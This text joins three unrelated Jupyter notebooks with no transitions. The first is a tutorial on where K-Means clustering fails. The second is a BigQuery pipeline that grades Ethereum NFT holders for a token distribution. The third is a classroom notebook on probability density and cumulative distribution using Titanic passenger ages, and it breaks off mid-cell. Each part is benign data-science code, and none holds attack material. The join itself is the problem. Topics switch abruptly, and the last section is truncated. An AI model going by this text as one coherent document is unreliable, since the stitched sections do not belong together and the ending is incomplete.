# K-Means Clustering: What can go wrong?
In this notebook, we will take a look at a few cases where the _KMC_ algorithm does not perform well or may produce unintuitive results.
In particular, we will look at the following scenarios:
1. Our guess on the number of (real) clusters is off.
2. The feature space is high-dimensional.
3. The clusters come in strange shapes.
All of these conditions can lead to problems with K-Means, so let's have a look.
```
%pylab inline
from sklearn import datasets
from sklearn.cluster import KMeans
from sklearn.datasets import make_blobs, make_circles, make_moons
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import pandas as pd
import itertools
```
## Wrong number of clusters
To make it easier, let's define a helper function `compare`, which will create and solve the clustering problem for us and then compare the results.
```
def compare(N_features, C_centers, K_clusters, dims=[0, 1], **kwargs):
    data, targets = make_blobs(
        n_samples=kwargs.get('n_samples', 400),
        n_features=N_features,
        centers=C_centers,
        cluster_std=kwargs.get('cluster_std', 0.5),
        shuffle=True,
        random_state=kwargs.get('random_state', 0))
    FEATS = ['x' + str(x) for x in range(N_features)]
    X = pd.DataFrame(data, columns=FEATS)
    X['cluster'] = KMeans(n_clusters=K_clusters, random_state=0).fit_predict(X)
    fig, axs = plt.subplots(1, 2, figsize=(12, 4))
    axs[0].scatter(data[:, dims[0]], data[:, dims[1]],
                   c='white', marker='o', edgecolor='black', s=20)
    axs[0].set_xlabel('x{} [a.u.]'.format(dims[0]))
    axs[0].set_ylabel('x{} [a.u.]'.format(dims[1]))
    axs[0].set_title('Original dataset')
    axs[1].set_xlabel('x{} [a.u.]'.format(dims[0]))
    axs[1].set_ylabel('x{} [a.u.]'.format(dims[1]))
    axs[1].set_title('Applying clustering')
    colors = itertools.cycle(['r', 'g', 'b', 'm', 'c', 'y'])
    for k in range(K_clusters):
        x = X[X['cluster'] == k][FEATS].to_numpy()
        axs[1].scatter(x[:, dims[0]], x[:, dims[1]], color=next(colors), edgecolor='k', alpha=0.5)
    plt.show()
```
### Too few clusters
```
compare(2, 4, 3)
compare(2, 4, 2)
```
Despite having distinct clusters in the data, we underestimated their number.
As a consequence, some disjoint groups of data are forced to fit into one larger cluster.
### Too many clusters
```
compare(2, 2, 3)
compare(2, 2, 4)
```
Contrary to the previous situation, trying to wrap the data into too many clusters creates artificial boundaries within the real data clusters.
## High(er) dimensional data
A dataset does not need to be very high-dimensional before we begin to see problems.
Visualizing, and thus analyzing, high-dimensional data is already challenging (the curse of dimensionality), and since KMC is often used to gain insight into the data, ambiguous projections do not help.
To explain the point, let's generate a three-dimensional dataset with clearly distinct clusters.
```
fig = plt.figure(figsize=(14, 8))
ax = fig.add_subplot(111, projection='3d')
data, targets = make_blobs(
n_samples=400,
n_features=3,
centers=3,
cluster_std=0.5,
shuffle=True,
random_state=0)
ax.scatter(data[:, 0], data[:, 1],
zs=data[:, 2], zdir='z', s=25, c='black', depthshade=True)
ax.set_xlabel('x0 [a.u.]')
ax.set_ylabel('x1 [a.u.]')
ax.set_zlabel('x2 [a.u.]')
ax.set_title('Original distribution.')
plt.grid()
plt.show()
```
Although there are infinitely many ways we can project this 3D dataset onto 2D, there are three primary orthogonal sub-spaces:
* `x0 : x1`
* `x1 : x2`
* `x2 : x0`
Looking at the `x2 : x0` projection, the dataset looks as if it only had two clusters. The lower-right "supercluster" is in fact two distinct groups, and even if we guess _K_ right (`K = 3`), the result looks like an apparent error, even though the clusters are very localized.
```
compare(3, 3, 3, dims=[0, 2])
```
To be sure, we have to look at the remaining projections to see the problem, literally, from different angles.
```
compare(3, 3, 3, dims=[1, 2])
compare(3, 3, 3, dims=[0, 1])
```
This makes more sense!
On the flip side, we had an incredible advantage here.
First, with three dimensions, we were able to plot the entire dataset.
Secondly, the clusters within the dataset were very distinct and thus easy to spot.
Finally, with a three-dimensional dataset, we only faced three standard 2D projections.
With _N > 3_ features, we would **not be able to plot the whole dataset**, and the number of 2D projections would scale quadratically with _N_:
$$\text{number of 2D projections} = \frac{N (N - 1)}{2}$$
not to mention that the dataset may have strangely shaped or non-localized clusters, which is our next challenge.
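As a quick sanity check of the formula above, we can compute the number of feature-pair projections for a few values of _N_:

```python
# Number of distinct 2D projections (unordered feature pairs) for N features
def n_projections(n_features):
    return n_features * (n_features - 1) // 2

for n in [3, 5, 10, 50]:
    print(f"{n} features -> {n_projections(n)} projections")
# 3 features give just 3 projections, but 50 features already give 1225
```

Even a modest 10-feature dataset would require 45 pairwise plots to inspect exhaustively.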
## Irregular datasets
So far we mentioned problems that are on "our side".
We looked at a very "well-behaved" dataset and discussed issues on the analytics side.
However, what if the dataset does not fit our solution or, rather, our **solution does not fit the problem?**
This is exactly the case when the data distribution comes in strange or irregular shapes.
```
fig, axs = plt.subplots(1, 3, figsize=(14, 4))
# unequal variance
X, y = make_blobs(n_samples=1400,
cluster_std=[1.0, 2.5, 0.2],
random_state=2)
y_pred = KMeans(n_clusters=3, random_state=2).fit_predict(X)
colors = [['r', 'g', 'b'][c] for c in y_pred]
axs[0].scatter(X[:, 0], X[:, 1], color=colors, edgecolor='k', alpha=0.5)
axs[0].set_title("Unequal Variance")
# anisotropically distributed data
X, y = make_blobs(n_samples=1400, random_state=156)
transformation = [[0.60834549, -0.63667341], [-0.40887718, 0.85253229]]
X = np.dot(X, transformation)
y_pred = KMeans(n_clusters=3, random_state=0).fit_predict(X)
colors = [['r', 'g', 'b'][c] for c in y_pred]
axs[1].scatter(X[:, 0], X[:, 1], color=colors, edgecolor='k', alpha=0.5)
axs[1].set_title("Anisotropicly Distributed Blobs")
# irregular shaped data
X, y = make_moons(n_samples=1400, shuffle=True, noise=0.1, random_state=120)
y_pred = KMeans(n_clusters=2, random_state=0).fit_predict(X)
colors = [['r', 'g', 'b'][c] for c in y_pred]
axs[2].scatter(X[:, 0], X[:, 1], color=colors, edgecolor='k', alpha=0.5)
axs[2].set_title("Irregular Shaped Data")
plt.show()
```
The left graph shows data whose distribution, although Gaussian, does not have equal standard deviation across clusters.
The middle graph presents _anisotropic_ data, meaning data that is elongated along a specific axis.
Finally, the right graph shows data that is completely non-Gaussian, despite being organized in clear clusters.
In each case, the irregularity makes the KMC algorithm underperform.
Since the algorithm treats every data point equally and completely independently of other points, it **fails to spot any possible continuity or local variations within a cluster**.
What it does is simply apply the same metric to every point.
As a result, the KMC algorithm may produce strange or counter-intuitive clustering even if we guess _K_ correctly and the number of features _N_ is small.
If the data were not already so localized around some points and the number of features were higher, our judgment would most likely be wrong.
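The assignment rule described above can be sketched in a few lines. This is a minimal illustration of one K-Means assignment step, not scikit-learn's actual implementation:

```python
import numpy as np

def assign_clusters(X, centroids):
    """One K-Means assignment step: send each point to its nearest centroid.

    Every point is treated identically and independently -- the rule knows
    nothing about cluster shape, density, or continuity.
    """
    # distances[i, k] = Euclidean distance from point i to centroid k
    distances = np.linalg.norm(X[:, None, :] - centroids[None, :, :], axis=2)
    return distances.argmin(axis=1)

X = np.array([[0.0, 0.0], [0.1, 0.2], [5.0, 5.0]])
centroids = np.array([[0.0, 0.0], [5.0, 5.0]])
print(assign_clusters(X, centroids))  # [0 0 1]
```

Nothing in this rule can express "these two points belong together because they lie on the same curve", which is exactly why the moon-shaped data above gets split incorrectly.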
## Conclusions
In this notebook, we have discussed three main reasons for the K-Means Clustering algorithm to give us wrong answers.
* First, as the number of clusters _K_ needs to be decided a priori, there is a high chance that we will guess it wrong.
* Secondly, clustering in a higher-dimensional space becomes cumbersome from the analytics point of view, in which case KMC may provide us with misleading insights.
* Finally, for irregularly shaped data, KMC is likely to produce artificial clusters that do not conform to common sense.
Despite these three pitfalls, KMC is still a useful tool, especially when initially inspecting the data or constructing labels.
## Masters of the Great Web and Cyberpunks. ERC721 Analysis
```
import pandas as pd
from config import PROJECT_ID, INITIAL_TS, SNAPSHOT_TS, \
ERC721_ANALYSIS_DATASET_NAME, ERC721_AMOUNT_TABLE_NAME, ERC721_ANALYSIS_DISTRIBUTION_TABLE_NAME, \
ERC721_ROW_TRANSFERS_TABLE_NAME, ETHERSCAN_NFT_CSV_NAME, ERC721_NFT_TOKEN_TABLE_NAME, ERC721_TOKEN_TABLE_NAME, \
MASTERS_AUDIENCE, CYBERPUNKS_AUDIENCE
from src.utils_bigquery import drop_table, create_table, get_df, create_table_from_df
from src.utils_charts import grade_boundaries_analysis
from src.extractor_nft_token_list import extract_nft_tokens
EXTRACT_NFT = False
DROP_TABLES = True
CREATE_TABLES = True
min_number_of_tokens = 0
erc721_tokens_manual_grade_2_dict = {
'ENS': '0x57f1887a8bf19b14fc0df6fd9b2acc9af147ea85'}
erc721_tokens_manual_grade_3_dict = {
'Gitcoin Kudos': '0x2aea4add166ebf38b63d09a75de1a7b94aa24163',
'LAND': '0xf87e31492faf9a91b02ee0deaad50d51d56d5d4d'}
erc721_tokens_manual_cyberpunks_dict = {
'Unicorns': '0x89205a3a3b2a69de6dbf7f01ed13b2108b2c43e7',
'DRAGON': '0x960f401aed58668ef476ef02b2a2d43b83c261d8',
'Cryptopunks': '0xb47e3cd837ddf8e4c57f05d70ab865de6e193bbb'}
nft_tokens_without_approvalforall_events = [
'0xdc76a2de1861ea49e8b41a1de1e461085e8f369f',
'0x7f556e211a3e4b57d005d3aa49a31306fa8bb34d',
'0x772da237fc93ded712e5823b497db5991cc6951e',
'0x9ab3ada106afdfae83f13428e40da70b3a22c50c',
'0x729cadcb048d96dacf4133d4418e57241da6a37a',
'0x79f75e9f93f89d33c20573dec03710c6d9ec538d',
'0x6ad0f855c97eb80665f2d0c7d8204895e052c373',
'0x07cdd617c53b07208b0371c93a02deb8d8d49c6e',
'0x06012c8cf97bead5deae237070f9587f8e7a266d',
'0x7fdcd2a1e52f10c28cb7732f46393e297ecadda1',
'0xd2f81cd7a20d60c0d558496c7169a20968389b40',
'0xf7a6e15dfd5cdd9ef12711bd757a9b6021abf643',
'0xdf5d68d54433661b1e5e90a547237ffb0adf6ec2',
'0x663e4229142a27f00bafb5d087e1e730648314c3',
'0x87d598064c736dd0c712d329afcfaa0ccc1921a1',
'0xa98ad92a642570b83b369c4eb70efefe638bc895',
'0x41a322b28d0ff354040e2cbc676f0320d8c8850d',
'0xefabe332d31c3982b76f8630a306c960169bd5b3',
'0x71c118b00759b0851785642541ceb0f4ceea0bd5',
'0xda9f43015749056182352e9dc6d3ee0b6293d80a',
'0xabc7e6c01237e8eef355bba2bf925a730b714d5f',
'0x1b5242794288b45831ce069c9934a29b89af0197',
'0x995020804986274763df9deb0296b754f2659ca1'
]
TRANSFER_256_EVENT_HASH = '0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef'
TRANSFER_128_EVENT_HASH = '0x27772adc63db07aae765b71eb2b533064fa781bd57457e1b138592d8198d0959'
TRANSFER_SINGLE_EVENT_HASH = '0xc3d58168c5ae7397731d063d5bbf3d657854427343f4c083240f7aacaa2d0f62'
TRANSFER_BATCH_EVENT_HASH = '0x4a39dc06d4c0dbc64b70af90fd698a233a518aa5d07e595d983b8c0526c8f7fb'
APPROVAL_FOR_ALL_EVENT_HASH = '0x17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31'
MINT_EVENT_HASH = '0x0f6798a560793a54c3bcfe86a93cde1e73087d944c0ea20544137d4121396885'
BURN_EVENT_HASH = '0xcc16f5dbb4873280815c1ee09dbd06736cffcc184412cf7a71a0fdb75d397ca5'
ENS_NAMEREGISTERED_EVENT_HASH = '0xb3d987963d01b2f68493b4bdb130988f157ea43070d4ad840fee0466ed9370d9'
LAND_TRANSFER_1_EVENT_HASH = '0x8988d59efc2c4547ef86c88f6543963bab0cea94f8e486e619c7c3a790db93be'
LAND_TRANSFER_2_EVENT_HASH = '0xd5c97f2e041b2046be3b4337472f05720760a198f4d7d84980b7155eec7cca6f'
CRYPTOPUNKS_ASSIGN_EVENT_HASH = '0x8a0e37b73a0d9c82e205d4d1a3ff3d0b57ce5f4d7bccf6bac03336dc101cb7ba'
CK_BIRTH_EVENT_HASH = '0x0a5311bd2a6608f08a180df2ee7c5946819a649b204b554bb8e39825b2c50ad5'
EVENTS = {
TRANSFER_256_EVENT_HASH: [1, 2, 3],
TRANSFER_128_EVENT_HASH: [1, 2, 3],
TRANSFER_SINGLE_EVENT_HASH: [2, 3, 4],
TRANSFER_BATCH_EVENT_HASH: [2, 3, 4],
MINT_EVENT_HASH: [0, 1, 2],
BURN_EVENT_HASH: [1, 0, 2],
ENS_NAMEREGISTERED_EVENT_HASH: [0, 2, 1],
LAND_TRANSFER_1_EVENT_HASH: [1, 2, 3],
LAND_TRANSFER_2_EVENT_HASH: [1, 2, 3],
CRYPTOPUNKS_ASSIGN_EVENT_HASH: [0, 1, 2],
CK_BIRTH_EVENT_HASH: [0, 1, 2]
}
EVENTS_HASHES = list(EVENTS.keys())
erc721_tokens_manual_grade_2_tuple_str = str(tuple(erc721_tokens_manual_grade_2_dict.values())).replace(',)', ')')
erc721_tokens_manual_grade_3_tuple_str = str(tuple(erc721_tokens_manual_grade_3_dict.values())).replace(',)', ')')
erc721_tokens_manual_cyberpunks_tuple_str = str(tuple(erc721_tokens_manual_cyberpunks_dict.values())).replace(',)', ')')
```
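A side note on the three `…_tuple_str` lines above: `str(tuple(...))` on a single-element sequence keeps Python's trailing comma, which is valid Python syntax but invalid inside a SQL `IN (...)` list — hence the `.replace(',)', ')')`. A quick illustration:

```python
# A one-element list formatted with str(tuple(...)) keeps Python's
# trailing comma, which SQL would reject inside an IN (...) clause.
addresses = ['0x57f1887a8bf19b14fc0df6fd9b2acc9af147ea85']
as_python = str(tuple(addresses))
as_sql = as_python.replace(',)', ')')
print(as_python)  # ('0x57f1887a8bf19b14fc0df6fd9b2acc9af147ea85',)
print(as_sql)     # ('0x57f1887a8bf19b14fc0df6fd9b2acc9af147ea85')
```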
### Get Transfers
```
query_1 = f'''
WITH logs AS (
SELECT
address as token_address,
topics[SAFE_ORDINAL(1)] as event_hash,
topics,
transaction_hash,
block_number,
data
FROM `bigquery-public-data.crypto_ethereum.logs`
WHERE block_timestamp >= '{INITIAL_TS}'
AND block_timestamp <= '{SNAPSHOT_TS}'
AND topics[SAFE_ORDINAL(1)] IN {tuple(EVENTS_HASHES + [APPROVAL_FOR_ALL_EVENT_HASH])}
),
token_addresses AS (
SELECT
token_address
FROM (
SELECT
token_address,
ARRAY_AGG(DISTINCT event_hash) as event_hashes
FROM logs
GROUP BY token_address
HAVING '{APPROVAL_FOR_ALL_EVENT_HASH}' in UNNEST(event_hashes)
AND ARRAY_LENGTH(event_hashes) > 1
)
UNION ALL
SELECT token_address
FROM UNNEST ({list(erc721_tokens_manual_cyberpunks_dict.values()) + nft_tokens_without_approvalforall_events}) as token_address
),
token_transfers_row AS (
SELECT
token_address,
event_hash,
if(from_argument_number = 0, '0x0000000000000000000000000000000000000000', REPLACE(topics[SAFE_ORDINAL(from_argument_number + 1)], '0x000000000000000000000000', '0x')) as from_address,
if(to_argument_number = 0, '0x0000000000000000000000000000000000000000', REPLACE(topics[SAFE_ORDINAL(to_argument_number + 1)], '0x000000000000000000000000', '0x')) as to_address,
CASE
WHEN ARRAY_LENGTH(topics) >= id_argument_number + 1 THEN [topics[SAFE_ORDINAL(id_argument_number + 1)]]
WHEN event_hash='{TRANSFER_SINGLE_EVENT_HASH}' THEN [LEFT(data, 66)]
WHEN event_hash='{TRANSFER_BATCH_EVENT_HASH}' THEN
(SELECT
ARRAY_AGG(CONCAT('0x', SUBSTR(token_data.token_data, i * 64 + 1, 64)))
FROM (
SELECT SAFE.SUBSTR(data, 64*3+3, CAST((LENGTH(data) - 2 - 64 * 4)/2 AS INT64)) AS token_data) AS token_data
CROSS JOIN
UNNEST (GENERATE_ARRAY(0,CAST(LENGTH(token_data.token_data)/64 - 1 AS INT64))) AS i)
ELSE [data]
END AS token_ids,
CASE
WHEN event_hash='{TRANSFER_SINGLE_EVENT_HASH}' THEN [CAST(REPLACE(CONCAT('0x', RIGHT(data, 64)), '0x000000000000000000000000', '0x') AS FLOAT64)]
WHEN event_hash='{TRANSFER_BATCH_EVENT_HASH}' THEN
(SELECT
ARRAY_AGG(CAST(REPLACE(CONCAT('0x', SUBSTR(token_data.token_data, i * 64 + 1, 64)), '0x000000000000000000000000', '0x') AS FLOAT64))
FROM (
SELECT SAFE.SUBSTR(data, 64*4+3 + CAST((LENGTH(data) - 2 - 64 * 4)/2 AS INT64), CAST((LENGTH(data) - 2 - 64 * 4)/2 AS INT64)) AS token_data) AS token_data
CROSS JOIN
UNNEST (GENERATE_ARRAY(0,CAST(LENGTH(token_data.token_data)/64 - 1 AS int64))) AS i)
ELSE [1.0]
END AS token_values,
data,
transaction_hash,
block_number
FROM logs
INNER JOIN token_addresses USING (token_address)
INNER JOIN (
SELECT
event_hash,
from_argument_number,
to_argument_number,
id_argument_number
FROM UNNEST([{''.join(f"STRUCT('{k}' AS event_hash, {v[0]} AS from_argument_number, {v[1]} AS to_argument_number, {v[2]} AS id_argument_number), " for k,v in EVENTS.items())[:-2]}])
)
USING (event_hash)
)
SELECT DISTINCT
token_address,
from_address,
to_address,
token_ids[SAFE_ORDINAL(id_ordinal)] as token_id,
token_values[SAFE_ORDINAL(id_ordinal)] as token_value,
transaction_hash,
block_number
FROM token_transfers_row,
UNNEST(GENERATE_ARRAY(1, array_length(token_ids))) as id_ordinal
'''
if DROP_TABLES:
    drop_table(table_name=ERC721_ROW_TRANSFERS_TABLE_NAME,
               dataset_name=ERC721_ANALYSIS_DATASET_NAME)
if CREATE_TABLES:
    create_table(query=query_1,
                 table_name=ERC721_ROW_TRANSFERS_TABLE_NAME,
                 dataset_name=ERC721_ANALYSIS_DATASET_NAME)
```
### Get Balances
```
query_2 = f'''
WITH excluding_erc1155_tokens AS (
SELECT DISTINCT
CONCAT(token_address, token_id) as excluding_token
FROM `{PROJECT_ID}.{ERC721_ANALYSIS_DATASET_NAME}.{ERC721_ROW_TRANSFERS_TABLE_NAME}`
WHERE token_value > 1
),
token_transfers_without_excluding_erc1155 AS (
SELECT
token_transfers.token_address,
from_address,
to_address,
token_transfers.token_id,
transaction_hash
FROM `{PROJECT_ID}.{ERC721_ANALYSIS_DATASET_NAME}.{ERC721_ROW_TRANSFERS_TABLE_NAME}` AS token_transfers
WHERE CONCAT(token_address, token_id) NOT IN (SELECT excluding_token FROM excluding_erc1155_tokens)
)
SELECT
token_address,
address,
sum(amount_change) as amount
FROM (
SELECT
token_address,
from_address as address,
- 1 as amount_change
FROM token_transfers_without_excluding_erc1155
UNION ALL
SELECT
token_address,
to_address as address,
1 as amount_change
FROM token_transfers_without_excluding_erc1155)
WHERE address != '0x0000000000000000000000000000000000000000'
AND token_address != address
GROUP BY token_address, address
ORDER BY amount
'''
if DROP_TABLES:
    drop_table(table_name=ERC721_AMOUNT_TABLE_NAME,
               dataset_name=ERC721_ANALYSIS_DATASET_NAME)
if CREATE_TABLES:
    create_table(query=query_2,
                 table_name=ERC721_AMOUNT_TABLE_NAME,
                 dataset_name=ERC721_ANALYSIS_DATASET_NAME)
```
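The balance logic in `query_2` emits a `-1` row for every sender and a `+1` row for every receiver, then sums per (token, address). The same idea can be sketched in pandas — a toy illustration with a hypothetical transfers frame mirroring the table's columns, not the production pipeline:

```python
import pandas as pd

# Hypothetical transfers: two mints to 0xA, then one transfer 0xA -> 0xB.
transfers = pd.DataFrame({
    'token_address': ['0xT1', '0xT1', '0xT1'],
    'from_address':  ['0x0000', '0x0000', '0xA'],
    'to_address':    ['0xA', '0xA', '0xB'],
})

# Same trick as query_2: -1 per outgoing transfer, +1 per incoming one.
outgoing = (transfers.rename(columns={'from_address': 'address'})
            [['token_address', 'address']].assign(amount_change=-1))
incoming = (transfers.rename(columns={'to_address': 'address'})
            [['token_address', 'address']].assign(amount_change=1))
balances = (pd.concat([outgoing, incoming])
            .query("address != '0x0000'")  # drop the zero (mint) address
            .groupby(['token_address', 'address'], as_index=False)['amount_change']
            .sum())
print(balances)  # 0xA holds 1 token, 0xB holds 1 token
```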
### ERC721 Contracts List
```
if EXTRACT_NFT:
    extract_nft_tokens()
if CREATE_TABLES:
    nft_tokens_df = pd.read_csv(ETHERSCAN_NFT_CSV_NAME, index_col=0)
    nft_tokens_df['token_address'] = nft_tokens_df['token_address'].map(lambda x: x.lower())
    create_table_from_df(source_df=nft_tokens_df,
                         table_name=ERC721_NFT_TOKEN_TABLE_NAME,
                         dataset_name=ERC721_ANALYSIS_DATASET_NAME,
                         drop_existing_table=DROP_TABLES)
query_3 = f'''
WITH tokens AS (
SELECT
token_address,
count(DISTINCT address) as number_of_owners
FROM `{PROJECT_ID}.{ERC721_ANALYSIS_DATASET_NAME}.{ERC721_AMOUNT_TABLE_NAME}`
WHERE amount > 0
GROUP BY token_address
),
manual_tokens AS (
SELECT
token.address AS token_address,
token.name AS token_name
FROM UNNEST(
[{''.join(f"STRUCT('{k}' AS name,'{v}' AS address), " for k,v in {**erc721_tokens_manual_grade_2_dict, **erc721_tokens_manual_grade_3_dict, **erc721_tokens_manual_cyberpunks_dict}.items())[:-2]}]
) as token
)
SELECT
token_address as address,
if(manual_tokens.token_name is not null, manual_tokens.token_name, nft_tokens.token_name) as name,
number_of_owners
FROM tokens
LEFT JOIN `{PROJECT_ID}.{ERC721_ANALYSIS_DATASET_NAME}.{ERC721_NFT_TOKEN_TABLE_NAME}` as nft_tokens
USING (token_address)
LEFT JOIN manual_tokens
USING (token_address)
'''
if DROP_TABLES:
    drop_table(table_name=ERC721_TOKEN_TABLE_NAME,
               dataset_name=ERC721_ANALYSIS_DATASET_NAME)
if CREATE_TABLES:
    create_table(query=query_3,
                 table_name=ERC721_TOKEN_TABLE_NAME,
                 dataset_name=ERC721_ANALYSIS_DATASET_NAME)
```
### Analysis of Grade Boundaries. Amount of ERC721 tokens
```
query_4 = f'''
SELECT
sum_amount,
count(address) as number_of_addresses
FROM (
SELECT
address,
count(distinct token_address) as number_of_tokens,
sum(amount) as sum_amount
FROM `{PROJECT_ID}.{ERC721_ANALYSIS_DATASET_NAME}.{ERC721_AMOUNT_TABLE_NAME}`
WHERE amount > 0
AND address != '0x0000000000000000000000000000000000000000'
AND address != token_address
GROUP BY address
HAVING sum_amount > {min_number_of_tokens})
GROUP BY sum_amount
'''
address_agg_by_sum_amount_of_tokens_df = get_df(query_4)
boundary_erc721_amount = \
grade_boundaries_analysis(
distribution_df=address_agg_by_sum_amount_of_tokens_df,
value_column = 'sum_amount',
value_chart_label = 'Amount of ERC721 tokens by address, Log10',
value_name = 'Amount of ERC721 tokens',
chart_title = 'Distribution of Addresses by Amount of ERC721 Tokens',
max_show_value = 5000)
```
### Analysis of Grade Boundaries. Fee spending to contracts
Described in the [Extraordinary Hackers and Masters of the Great Web. Gas Analysis](gas__hackers_and_masters.ipynb) Jupyter notebook.
### Distribution Rules. Masters of the Great Web
<table style="text-align: left">
<thead style="text-align: center">
<tr>
<th rowspan=2></th>
<th colspan=3>Grade</th>
</tr>
<tr>
<th>1</th>
<th>2</th>
<th>3</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left"> Amount of ERC721 tokens </td>
<td style="text-align: center"> > 0 NFT </td>
<td style="text-align: center"> > 12 NFT </td>
<td style="text-align: center"> > 160 NFT </td>
</tr>
<tr>
<td style="text-align: left"> Owners of the Selected ERC721 tokens </td>
<td style="text-align: center"> - </td>
<td style="text-align: center"> ENS </td>
<td style="text-align: center"> Gitcoin Kudos or LAND </td>
</tr>
<tr>
<td style="text-align: left"> Fee spending to contracts<sup>1</sup>, by contract creators, ETH </td>
<td style="text-align: center"> > 0 ETH </td>
<td style="text-align: center"> > 0.004 ETH </td>
<td style="text-align: center"> > 0.477 ETH </td>
</tr>
</tbody>
</table>
<sup>1</sup> including contracts created by factories only
### Distribution Rules. Cyberpunks
<table style="text-align: left">
<thead style="text-align: center">
<tr>
<th rowspan=2></th>
<th colspan=3>Grade</th>
</tr>
<tr>
<th>1</th>
<th>2</th>
<th>3</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left"> Owners of the Selected ERC721 tokens </td>
<td style="text-align: center"> - </td>
<td style="text-align: center"> - </td>
<td style="text-align: center"> Unicorns, DRAGON or Cryptopunks </td>
</tr>
<tr>
<td style="text-align: left"> Urbit Owners </td>
<td style="text-align: center"> - </td>
<td style="text-align: center"> - </td>
<td style="text-align: center"> here </td>
</tr>
</tbody>
</table>
### Create Distribution Table for ERC721 Tokens
```
query_4 = f'''
WITH erc721_amount AS (
SELECT
address,
count(distinct token_address) as number_of_tokens,
ARRAY_AGG(DISTINCT token_address) as token_list,
sum(amount) as sum_amount
FROM `{PROJECT_ID}.{ERC721_ANALYSIS_DATASET_NAME}.{ERC721_AMOUNT_TABLE_NAME}`
WHERE amount > 0
AND address != '0x0000000000000000000000000000000000000000'
AND address != token_address
GROUP BY address),
urbit_owners AS (
SELECT
owner,
count(point) as sum_amount
FROM `cosmic-keep-223223.erc721_analysis.azimuth_points`
GROUP BY owner)
SELECT
'{MASTERS_AUDIENCE}' as audience,
CASE
WHEN (SELECT COUNT(1) FROM UNNEST(token_list) el WHERE el IN {erc721_tokens_manual_grade_3_tuple_str}) > 0 THEN 'Owners of the Selected ERC721 tokens'
WHEN (SELECT COUNT(1) FROM UNNEST(token_list) el WHERE el IN {erc721_tokens_manual_grade_2_tuple_str}) > 0 AND sum_amount <= {boundary_erc721_amount[2]} THEN 'Owners of the Selected ERC721 tokens'
ELSE 'Owners of ERC721 tokens'
END
AS segment,
address,
CASE
WHEN sum_amount > {boundary_erc721_amount[2]} OR (SELECT COUNT(1) FROM UNNEST(token_list) el WHERE el IN {erc721_tokens_manual_grade_3_tuple_str}) > 0 THEN 3
WHEN sum_amount > {boundary_erc721_amount[1]} OR (SELECT COUNT(1) FROM UNNEST(token_list) el WHERE el IN {erc721_tokens_manual_grade_2_tuple_str}) > 0 THEN 2
WHEN sum_amount > {boundary_erc721_amount[0]} THEN 1
ELSE null
END
AS grade,
sum_amount,
number_of_tokens
FROM erc721_amount
WHERE number_of_tokens > {min_number_of_tokens}
UNION ALL
SELECT
'{CYBERPUNKS_AUDIENCE}' as audience,
'Owners of the Selected ERC721 tokens' as segment,
address,
3 AS grade,
sum_amount,
number_of_tokens
FROM erc721_amount
WHERE (SELECT COUNT(1) FROM UNNEST(token_list) el WHERE el IN {erc721_tokens_manual_cyberpunks_tuple_str}) > 0
UNION ALL
SELECT
'{CYBERPUNKS_AUDIENCE}' as audience,
'Urbit Owners' as segment,
owner as address,
3 AS grade,
sum_amount,
1 as number_of_tokens
FROM urbit_owners
'''
if DROP_TABLES:
    drop_table(table_name=ERC721_ANALYSIS_DISTRIBUTION_TABLE_NAME,
               dataset_name=ERC721_ANALYSIS_DATASET_NAME)
if CREATE_TABLES:
    create_table(query=query_4,
                 table_name=ERC721_ANALYSIS_DISTRIBUTION_TABLE_NAME,
                 dataset_name=ERC721_ANALYSIS_DATASET_NAME)
```
### Create Distribution Table for Spending Fee Analysis
Distribution has been calculated in the [Extraordinary Hackers and Masters of the Great Web. Gas Analysis](gas__hackers_and_masters.ipynb) Jupyter notebook.
# Learning Objectives
- By the end of this class, you will be able to write functions to compute the probability density function and the cumulative distribution function
- You will be able to use the `scipy.stats` package to compute the survival value or CDF value for a known distribution
```
import numpy as np
import pandas as pd
df = pd.read_csv('../Pandas/titanic.csv')
```
## Probability Density Function (PDF)
- A PDF has a pattern very similar to a histogram. The only difference is that the histogram values are normalized
- Let's plot the histogram for Age in the Titanic dataset
## Activity (Histogram Reminder): Plot the Histogram of Age for the Titanic Dataset
```
import seaborn as sns
ls_age = df['Age'].dropna()
sns.distplot(ls_age, hist=True, kde=False, bins=16)
```
- Let's now plot the PDF of Age in the Titanic dataset
```
import seaborn as sns
sns.distplot(df['Age'].dropna(), hist=True, kde=True, bins=16)
```
## Activity: In the PDF, where do the y-axis numbers come from? For example, at Age 20-25, why is the y-value around 0.030?
```
# custom histogram function
def custom_hist(ls, interval):
    hist_ls_dict = dict()
    min_ls = np.min(ls)
    max_ls = np.max(ls)
    print(max_ls)
    I = (max_ls - min_ls) / interval  # bin width
    print(I)
    for j in range(interval):
        # count the elements that fall into the j-th bin
        hist_ls_dict[(min_ls + j*I, min_ls + (j+1)*I)] = np.sum(((min_ls + j*I) <= ls) & (ls <= (min_ls + (j+1)*I)))
    return hist_ls_dict
print(custom_hist(df['Age'].dropna().values, 16))
hist_dict = custom_hist(df['Age'].dropna().values, 16)
sum(hist_dict.values())
122/714/4.97375  # bin count / total count / bin width -> the normalized (PDF) height
```
## Activity: What percent of passengers are younger than 40?
```
younger_than_40 = df[df['Age'] <= 40]
pr_below_40 = len(younger_than_40)/len(df['Age'].dropna())
pr_below_40
```
## It is not easy to calculate this percentage from a PDF, as we would have to compute the area under the curve
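To make the contrast concrete, here is a small sketch using a normal distribution as a stand-in for the age distribution (the parameters are purely illustrative): obtaining P(X ≤ 40) from the PDF requires integrating the area under the curve, while the CDF returns it with a single call:

```python
import numpy as np
from scipy.integrate import quad
from scipy.stats import norm

# Illustrative stand-in density: Normal(mean=30, std=14)
mu, sigma = 30, 14

# PDF route: integrate the area under the density up to 40
area, _ = quad(lambda x: norm.pdf(x, mu, sigma), -np.inf, 40)

# CDF route: one function evaluation, no integration needed
direct = norm.cdf(40, loc=mu, scale=sigma)

print(area, direct)  # the two values agree
```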
## Cumulative Distribution Function (CDF)
- In the above example, we could not easily obtain the percentage from the PDF, although it is possible.
- With a CDF, we can.
- Let's learn the CDF by example. CDF computation needs two steps:
1 - For a given array of numbers and a given threshold, count how many elements in the array are less than the threshold
2 - Vary the threshold from the minimum to the maximum value of the array
```
ls_age = df['Age'].dropna().values
def calculate_cdf(x, threshold):
    return np.sum(x <= threshold)
cdf_age = [calculate_cdf(ls_age, r)/len(ls_age) for r in range(int(np.min(ls_age)), int(np.max(ls_age)))]
import matplotlib.pyplot as plt
